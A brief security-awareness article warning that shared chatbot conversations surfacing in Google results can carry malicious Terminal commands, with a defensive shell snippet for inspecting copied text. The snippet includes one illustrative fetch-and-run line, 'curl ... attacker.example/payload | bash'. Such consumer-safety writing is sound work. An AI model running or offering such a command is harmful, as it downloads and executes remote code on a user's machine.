When Google Points to a Chatbot Conversation, Be Skeptical


Here’s something new to watch out for: poisoned chatbot conversations surfaced in Google searches. The sharing features in ChatGPT, Claude, Gemini, Grok, and other chatbots let users publish their conversations as public web pages, which search engines can index and display alongside traditional websites in search results. Attackers can seed those conversations with malicious commands, and the conversations look trustworthy in results because the URL points to a well-known AI company. This risk isn’t theoretical: security firm Huntress documented a macOS malware infection that began with a Google search result linking to a shared chatbot conversation containing malicious Terminal instructions.

Treat chatbot conversations found via Google as you would random forum posts: potentially useful for background or as ideas to start your own conversation, but not as authoritative instructions. Be especially suspicious when they offer step-by-step guidance or ask you to copy anything verbatim.
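If a page does tell you to paste something into Terminal, one cautious habit (a sketch of the advice above, not something prescribed in the Huntress report) is to save the copied text to a file and read it before anything executes. The command string below is a made-up illustration, not real malware:

```shell
# Hypothetical example: a search result tells you to run a one-liner.
# Instead of pasting it straight into Terminal, save it and read it first.

# Pretend this is the text you were told to copy (invented for illustration):
COPIED='echo "installing"; curl -s http://attacker.example/payload | bash'

# Write it to a file so nothing runs, then inspect it:
printf '%s\n' "$COPIED" > pasted-command.txt
cat pasted-command.txt   # look for red flags: curl|bash, base64, sudo, etc.
```

On macOS, you can also inspect whatever is currently on the clipboard with `pbpaste` before pasting it anywhere, which catches cases where a web page silently altered what you copied.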

(Featured image by iStock.com/tadamichi)
